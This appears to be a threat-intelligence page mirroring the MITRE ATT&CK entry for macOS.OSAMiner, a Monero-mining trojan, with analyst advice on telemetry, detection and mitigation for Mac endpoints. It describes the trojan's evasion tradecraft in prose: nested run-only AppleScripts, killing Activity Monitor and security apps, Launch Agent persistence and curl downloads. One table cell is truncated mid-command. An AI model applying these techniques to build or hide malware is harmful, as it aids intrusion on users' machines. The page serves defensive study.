S1048: macOS.OSAMiner
macOS.OSAMiner is a Monero mining trojan that was first observed in 2018; security researchers assessed macOS.OSAMiner may have been circulating since at least 2015. macOS.OSAMiner is known for embedding one run-only AppleScript into another, which helped the malware evade full analysis for five years due to a lack of Apple event (AEVT) analysis tools.[1][2]
Analyst context for executives and security teams
macOS.OSAMiner matters because it shows how macOS malware can hide operationally important behavior inside AppleScript rather than relying on obvious binaries. For leaders, the risk is not just cryptocurrency mining; it is whether the organization can see script execution, persistence, downloads, and discovery activity on Macs well enough to investigate quickly.
Executive priority
Prioritize this as a macOS visibility and response-readiness test. Ask whether managed Macs produce usable evidence for AppleScript execution, Launch Agent persistence, launchctl activity, file ingress, discovery commands, and suspicious resource usage. This is especially relevant where Mac endpoints are used by executives, developers, or privileged users and where audit evidence depends on endpoint logging consistency.
Technical view
ATT&CK links macOS.OSAMiner to AppleScript execution, embedded and stripped payloads, process/system/storage discovery, ingress tool transfer, Launch Agent persistence, launchctl execution, system checks, and a defense-impairment relationship. SOC and IR teams should validate whether macOS telemetry captures osascript and AppleEvents-related execution, creation or modification of LaunchAgents plist files, launchctl usage, downloaded or transferred payloads, and discovery behavior. Because the official ATT&CK object provides no detection text, detections should be validated against local macOS administrative scripting baselines and not assumed from Windows-centric endpoint coverage.
Likely telemetry
- macOS process execution telemetry, especially osascript and launchctl activity
- AppleScript or AppleEvents-related execution evidence where available
- File creation and modification events for /Library/LaunchAgents and ~/Library/LaunchAgents plist files
- Network and file-transfer telemetry showing externally retrieved tools or payloads
- Endpoint file and script analysis artifacts for embedded or run-only AppleScript content
Detection direction
- Confirm that macOS endpoints generate searchable process, file, and persistence telemetry; do not rely only on generic malware signatures.
- Tune AppleScript detections around unusual osascript execution, nested or run-only scripts, and scripts that lead to downloads, discovery, or persistence changes.
- Monitor Launch Agent plist creation or modification together with launchctl execution to reduce false positives from legitimate software management activity.
- Correlate process discovery, system information discovery, local storage discovery, and ingress transfer rather than alerting on each behavior in isolation.
- Account for legitimate AppleScript automation by developers, IT administrators, and productivity tools when building allowlists.
Mitigation priorities
- Establish reliable macOS endpoint logging and retention before depending on detections for this behavior.
- Restrict and monitor persistence paths such as user and system LaunchAgents according to least privilege and change-control expectations.
- Harden script execution governance for AppleScript where business use allows, while documenting approved administrative automation.
- Improve file-transfer monitoring and egress review for Macs that can retrieve tools or payloads from external systems.
- Use endpoint management to maintain security tooling health and verify that Mac coverage is represented in compliance and incident-response evidence.
Analyst notes and limits
The strongest decision value is using this object as a macOS control-validation scenario: can the organization observe script-based execution, obfuscated or embedded payload handling, persistence, discovery, and inbound tool transfer on Apple endpoints? The supplied sources emphasize run-only AppleScript analysis challenges, so reverse-engineering and sandbox visibility may be a blind spot.
The official ATT&CK object does not provide detection guidance, aliases, labels, or object-level tactics. Guidance above is derived from the supplied description, external references, platform field, and listed uses relationships. Local environment evidence is required to determine prevalence, exposure, and detection coverage.
macOS.OSAMiner
macOS.OSAMiner is a Monero mining trojan that was first observed in 2018; security researchers assessed macOS.OSAMiner may have been circulating since at least 2015. macOS.OSAMiner is known for embedding one run-only AppleScript into another, which helped the malware evade full analysis for five years due to a lack of Apple event (AEVT) analysis tools.[1][2]
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1685 | Disable or Modify Tools | macOS.OSAMiner has searched for the Activity Monitor process in the System Events process list and kills the process if running. macOS.OSAMiner also searches the operating system's `install.log` for apps matching its hardcoded list, killing all matching process names.CitationSentinelLabs reversing run-only applescripts 2021 |
| Enterprise | T1105 | Ingress Tool Transfer | macOS.OSAMiner has used `curl` to download a Stripped Payloads from a public facing adversary-controlled webpage. |
| Enterprise | T1680 | Local Storage Discovery | macOS.OSAMiner has checked to ensure there is enough disk space using the Unix utility `df`.CitationSentinelLabs reversing run-only applescripts 2021 |
| Enterprise | T1497.001 | System Checks Sub-technique | macOS.OSAMiner can parse the output of the native `system_profiler` tool to determine if the machine is running with 4 cores.CitationSentinelLabs reversing run-only applescripts 2021 |
| Enterprise | T1027.008 | Stripped Payloads Sub-technique | macOS.OSAMiner has used run-only Applescripts, a compiled and stripped version of AppleScript, to remove human readable indicators to evade detection.CitationSentinelLabs reversing run-only applescripts 2021 |
| Enterprise | T1027.009 | Embedded Payloads Sub-technique | macOS.OSAMiner has embedded Stripped Payloads within another run-only Stripped Payloads.CitationSentinelLabs reversing run-only applescripts 2021 |
| Enterprise | T1082 | System Information Discovery | macOS.OSAMiner can gather the device serial number.CitationSentinelLabs reversing run-only applescripts 2021 |
| Enterprise | T1543.001 | Launch Agent Sub-technique | macOS.OSAMiner has placed a Stripped Payloads with a `plist` extension in the Launch Agent's folder. CitationSentinelLabs reversing run-only applescripts 2021 |
| Enterprise | T1569.001 | Launchctl Sub-technique | macOS.OSAMiner has used `launchctl` to restart the Launch Agent.CitationSentinelLabs reversing run-only applescripts 2021 |
| Enterprise | T1057 | Process Discovery | macOS.OSAMiner has used `ps ax | grep |
| Enterprise | T1059.002 | AppleScript Sub-technique | macOS.OSAMiner has used `osascript` to call itself via the `do shell script` command in the Launch Agent `.plist` file.CitationSentinelLabs reversing run-only applescripts 2021 |
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | 1.1 | Current bundle | c60c087b64d5… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
-
[1]
SentinelLabs reversing run-only applescripts 2021
Phil Stokes. (2021, January 11). FADE DEAD | Adventures in Reversing Malicious Run-Only AppleScripts. Retrieved September 29, 2022.
Open source URL -
[2]
VMRay OSAMiner dynamic analysis 2021
VMRAY. (2021, January 14). Malware Analysis Spotlight: OSAMiner Uses Run-Only AppleScripts to Evade Detection. Retrieved October 4, 2022.
Open source URL -
[3]
mitre-attack S1048Open source URL
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.